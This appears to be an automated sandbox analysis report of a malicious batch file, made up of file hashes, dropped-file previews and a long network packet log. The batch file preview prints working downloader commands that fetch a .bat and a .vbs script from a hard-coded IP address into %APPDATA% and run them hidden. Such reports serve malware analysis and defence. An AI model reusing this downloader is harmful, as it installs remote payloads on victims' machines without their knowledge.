                      Preview:]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):298
                      Entropy (8bit):3.5220857354252697
                      Encrypted:false
                      SSDEEP:6:kL98fuXUEZglJPZOjzkjTtE9+AQy0lb2SyP1:kxmuMJsX9+nV4t
                      MD5:D14FEAC356ADA5DFD8E8FF6BEEBB81E7
                      SHA1:904EC973E50BB62C20B55A3C4EE502DD9259C1CA
                      SHA-256:6DB14E74E0C8C995EC8519C9758B21F44196B4AAB67C718759BC19852E6A2C83
                      SHA-512:61B73DFBB3C12203B2F3675C04023349A7596BF8265FB73412ABF7849F331591A0702FD999A907F264019312C3D165C2105D61B7FDBEDC09CE23C49B0E4E419A
                      Malicious:false
                      Preview:.....gLs...K...9>...F.......<... ................ ....................9.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.........#.....................................
                      File type:DOS batch file, ASCII text, with CRLF line terminators
                      Entropy (8bit):5.080483099180641
                      TrID:
                        File name:55Ka50lb6Z.bat
                        File size:191 bytes
                        MD5:4d8b2d19bdd29e6d89e0769cff9b0b48
                        SHA1:07c4469751a5ddf43288b8ea7d32afce71783a2c
                        SHA256:1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
                        SHA512:dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc
                        SSDEEP:3:mKDDGKSSJJFSpXLgL+h9JAFAkKivDWMdzGSJJFSpXLgLLHLqXJAFAkKivNJKTmw9:hSGmp6+h978bWMdz9mp6LrqX78VgGppC
                        TLSH:11C012A63091B27C890FCAE8347C8408A44485D075EA0FD5F164095A6E4AC3CA059FC9
                        File Content Preview:@echo off..powershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.bat..powershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbs..start /min cmd /c %APPDATA%/hi.vbs..exit
                        Icon Hash:9686878b929a9886
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 25, 2024 16:03:14.880182981 CEST4971180192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:14.885066032 CEST8049711172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:14.885195017 CEST4971180192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:14.889024973 CEST4971180192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:14.893857002 CEST8049711172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:16.695877075 CEST8049711172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:16.749206066 CEST4971180192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:16.806688070 CEST4971180192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:17.719029903 CEST4971480192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:17.727284908 CEST8049714172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:17.727404118 CEST4971480192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:17.759859085 CEST4971480192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:17.764676094 CEST8049714172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:19.699534893 CEST8049714172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:19.740387917 CEST4971480192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:21.848773956 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:21.853815079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:21.853914976 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:21.855631113 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:21.862263918 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714893103 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714921951 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714935064 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714946985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714963913 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714975119 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714981079 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.714987993 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.714999914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.715090990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.715173960 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.715188026 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.715235949 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.719903946 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.719926119 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.719939947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.719985008 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.798142910 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.798158884 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.798213005 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.808455944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808474064 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808496952 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808506966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808537960 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.808562994 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.808695078 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808707952 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808722973 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.808763027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.809123993 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809134960 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809180975 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.809366941 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809379101 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809407949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809408903 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.809420109 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809432030 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.809457064 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.809482098 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.811526060 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811553001 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811566114 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811578035 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811595917 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.811599970 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811611891 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811619043 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.811625004 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811635971 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811649084 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811662912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.811666012 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.811706066 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897717953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897746086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897759914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897772074 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897780895 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897785902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897797108 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897811890 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897814989 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897830963 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897872925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897888899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897902012 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897914886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897948980 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897950888 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897960901 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897973061 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897984982 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.897984982 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.897996902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898015022 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.898044109 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.898844004 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898878098 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898890972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898916960 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.898941040 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898952961 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898966074 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898972988 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.898978949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.898993969 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.899002075 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.899030924 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.901562929 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.901669025 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.901705027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.901808023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902157068 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902169943 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902199030 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.902334929 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902348995 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902369976 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.902842999 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.902894974 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.903765917 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903781891 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903794050 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903805017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903817892 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903830051 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903841019 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.903845072 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903856993 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903867006 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.903868914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903879881 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903887033 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.903896093 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903907061 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.903925896 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.903951883 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.985935926 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.985985994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.985997915 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986010075 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986023903 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986035109 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986038923 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986063004 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986109018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986279964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986291885 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986304998 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986318111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986329079 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986351967 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986542940 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986557961 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986569881 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986612082 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986619949 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.986625910 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.986649990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.987030983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987046003 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987060070 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987075090 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.987093925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.987124920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987144947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987157106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987169981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987184048 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987191916 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.987196922 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987210989 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.987215996 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.987246990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988037109 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988056898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988070011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988081932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988087893 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988095045 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988106966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988107920 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988121033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988133907 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988141060 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988147020 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988161087 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988179922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988199949 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988806009 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988852024 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988894939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988907099 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988923073 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988941908 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988948107 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988960981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988971949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988981962 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.988986015 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.988996983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989012957 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989012957 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989042997 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989743948 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989758015 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989772081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989813089 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989837885 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989839077 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989850044 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989861965 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989872932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989886045 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989896059 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989897966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989911079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.989928007 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.989953995 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:22.990577936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:22.990617990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074731112 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074750900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074764013 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074812889 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074857950 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074870110 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074882030 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074892044 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074893951 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074906111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074918985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074929953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074930906 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074940920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074953079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074964046 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074970961 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074975967 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.074985981 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.074987888 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075001955 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075014114 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075016975 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075033903 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075335979 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075346947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075361013 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075371981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075372934 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075391054 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075392962 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075414896 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075426102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075436115 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075438023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075450897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075465918 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075467110 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075493097 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075745106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075781107 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075793982 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075804949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075836897 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.075980902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.075992107 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076004028 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076016903 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076030016 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076049089 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076057911 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076070070 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076081991 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076116085 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076158047 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076169014 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076179981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076193094 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076194048 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076210976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076221943 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076222897 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076235056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076251984 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076277018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076740980 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076836109 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076847076 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076858044 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076869011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076872110 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076881886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076894045 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076903105 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076930046 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.076958895 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076970100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076981068 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076992989 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.076992989 CEST4971580192.168.2.6172.94.3.25
